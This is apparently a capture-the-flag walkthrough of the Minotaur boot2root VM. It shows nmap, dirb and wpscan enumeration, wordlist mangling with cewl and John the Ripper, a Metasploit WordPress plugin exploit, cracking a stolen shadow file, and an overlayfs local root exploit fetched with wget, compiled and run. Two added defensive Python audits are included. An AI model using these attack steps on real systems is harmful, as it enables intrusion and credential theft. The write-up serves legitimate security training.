SecTalks: BNE0x00 – Minotaur

Description

Minotaur CTF
Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.

Hints
This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Enumeration

There is some problem with finding the VM in my host-only network.
To tackle this problem I tried a horizontal scan at port 80.

nmap -v -O 192.168.56.0/24 -Pn -p 80


After I found the host, I went for a vertical scan at the found host.

nmap -A -p- -T4 192.168.56.223


Port 22 (SSH), 80 (web) and 2020 (FTP) are open. Also, anonymous FTP login is allowed on port 2020. After I tried the web server, which had nothing of importance, I tried SSH.
SSH was protected by authentication. So finally I went for the third and final option.

Anonymous FTP login

Let’s log in with the username ‘anonymous’.

ftp 192.168.56.223 2020


Well that’s not it. My options are running short. I need more information. Time to give Dirb another try, but this time with a different list.

dirb http://192.168.56.223 /usr/share/wordlists/dirb/big.txt


Nice. Dirb found the directory ‘bull’ and it seems it runs on WordPress. Let’s take a look.
Looks like the website runs on WordPress version 4.2.2. Time to use wpscan.

wpscan --url http://192.168.56.223 --enumerate u


There is the username. Now for the password. The hint in the description said I needed to generate my own wordlist, because it wasn’t on rockyou.txt. So let’s start generating wordlists.

cewl -w wordlist.txt http://192.168.56.223/bull/

wpscan --url http://192.168.56.223/bull/ --wordlist /wordlist.txt --username bully --threads 50


Nothing. Hmmmm. The hint was clear. My list isn’t sufficient. I need to mix up the collected words in my list more. Maybe I can find something with Google.
Not really anything I was looking for. But there were an awful lot of mentions of John the Ripper. Looking in Kali at the options of this program, there was an option for mangling words. With this information I started searching Google differently, and after a while I found a site with the right answer (https://www.win.tue.nl/~aeb/linux/john/john.html).

john --wordlist=wordlist.txt --rules --stdout > mangled-wordlist.txt


Yes! Jackpot!
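
A defender-side view of the same technique, as an added example that is not part of the original write-up: a password-set check that rejects passwords derivable from words on the organisation's own pages. The undo rules are a small illustrative subset, not John the Ripper's rule set, and the page text and function names are constructed.

```python
import re

# Reverse of common leetspeak substitutions (illustrative subset).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s", "!": "i"})
AFFIX = re.compile(r"^[^a-z]+|[^a-z]+$")  # digits/symbols glued to either end

def site_words(page_text, min_len=5):
    """Words a crawler such as cewl would harvest from our own pages."""
    return {w.lower() for w in re.findall(r"[A-Za-z]+", page_text)
            if len(w) >= min_len}

def candidate_bases(password):
    """Undo case changes, leetspeak, affixes, reversal and doubling."""
    pw = password.lower()
    bases = set()
    # Try de-leeting both before and after trimming, since "1" may be
    # either a substituted "i" or an appended digit.
    for form in (pw, AFFIX.sub("", pw)):
        plain = AFFIX.sub("", form.translate(LEET))
        half = len(plain) // 2
        bases.update({plain, plain[::-1]})
        if len(plain) % 2 == 0 and plain[:half] == plain[half:]:
            bases.add(plain[:half])
    bases.discard("")
    return bases

def derived_from_site(password, words):
    """Return the site word the password is built on, or None."""
    hits = sorted(candidate_bases(password) & words)
    return hits[0] if hits else None

# Constructed sample page text, not taken from the target in this write-up.
PAGE = "Acme Harbour Kayak rentals: paddle the estuary with certified guides."
WORDS = site_words(PAGE)

if __name__ == "__main__":
    for pw in ("Kayak2016!", "3stuary", "yrautse99", "paddlepaddle",
               "correct-horse-battery"):
        print(pw, "->", derived_from_site(pw, WORDS))
```
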
Now let’s get back to a previously found vulnerability during the first wpscan.


Time to start up Metasploit and search the database for a Slideshow Gallery exploit.

msfconsole


Now to get a shell and look around.


We have a flag. But looks like there is more…….

find / -print | grep -i flag.txt
/var/www/html/flag.txt
/tmp/flag.txt
cat /var/www/html/flag.txt


Back to the shadow.bak file. Let’s download it and run it with John the Ripper.

meterpreter > download /tmp/shadow.bak
[*] downloading: /tmp/shadow.bak -> shadow.bak
[*] download : /tmp/shadow.bak -> shadow.bak


heffer@minotaur:/home$ cd heffer
heffer@minotaur:~$ ls
flag.txt
heffer@minotaur:~$ cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0

 

minotaur@minotaur:/home/heffer$ cd /home/minotaur
minotaur@minotaur:~$ ls
flag.txt peda
minotaur@minotaur:~$ cat flag.txt
Congrats! You’ve found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?

Why yes I can!

minotaur@minotaur:~$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.2 LTS"
NAME="Ubuntu"
VERSION="14.04.2 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.2 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

So Ubuntu 14.04. That means I’m going for ‘overlayfs’ Local Root Shell (https://www.exploit-db.com/exploits/37292/).

minotaur@minotaur:~$ wget http://192.168.56.102/overlayfs.c
wget http://192.168.56.102/overlayfs.c
--2016-07-29 01:36:49-- http://192.168.56.102/overlayfs.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘overlayfs.c’

100%[======================================>] 4,968 --.-K/s in 0s

2016-07-29 01:36:49 (152 MB/s) - ‘overlayfs.c’ saved [4968/4968]

minotaur@minotaur:~$ ls
ls
flag.txt overlayfs.c peda
minotaur@minotaur:~$ gcc overlayfs.c -o overlayfs
minotaur@minotaur:~$ chmod 777 overlayfs
minotaur@minotaur:~$ ls
flag.txt overlayfs overlayfs.c peda
minotaur@minotaur:~$ ./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root

Woot! Now let’s get the final flag.

# cd /root
# ls
flag.txt peda quotes.txt
# cat flag.txt
cat flag.txt


After a different approach I learned that the final flag was much simpler to obtain.
The whole getting root was not necessary seeing that user minotaur was able to run every program as root. But hey…..It was fun anyway.
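
An audit check for the condition described above, as an added example that is not part of the original write-up. It assumes the access was granted through sudo, which the post does not state; the parser handles only simple one-line rules, and the sample file and function name are constructed.

```python
import re

RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...

def unrestricted_sudo(sudoers_text):
    """Return (who, runas, nopasswd) for each non-root rule granting ALL."""
    findings = []
    text = sudoers_text.replace("\\\n", " ")  # join continued lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments (simplified)
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = RULE.match(line)
        if not m or m.group(1) == "root":
            continue
        who, runas, rest = m.group(1), m.group(2) or "root", m.group(3)
        cmds = [TAGS.sub("", c.strip()) for c in rest.split(",")]
        # "ALL, !/bin/su" still counts: the sudoers manual warns that
        # subtracting commands from ALL with "!" is not effective.
        if "ALL" in cmds:
            findings.append((who, runas, "NOPASSWD:" in rest))
    return findings

SAMPLE = """\
# constructed sample, not the VM's real configuration
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
deploy  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) /usr/bin/rsync
%admin  ALL=(ALL) ALL, !/bin/su
"""

if __name__ == "__main__":
    for who, runas, nopasswd in unrestricted_sudo(SAMPLE):
        print(f"{who}: any command as {runas}, password-free={nopasswd}")
```
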
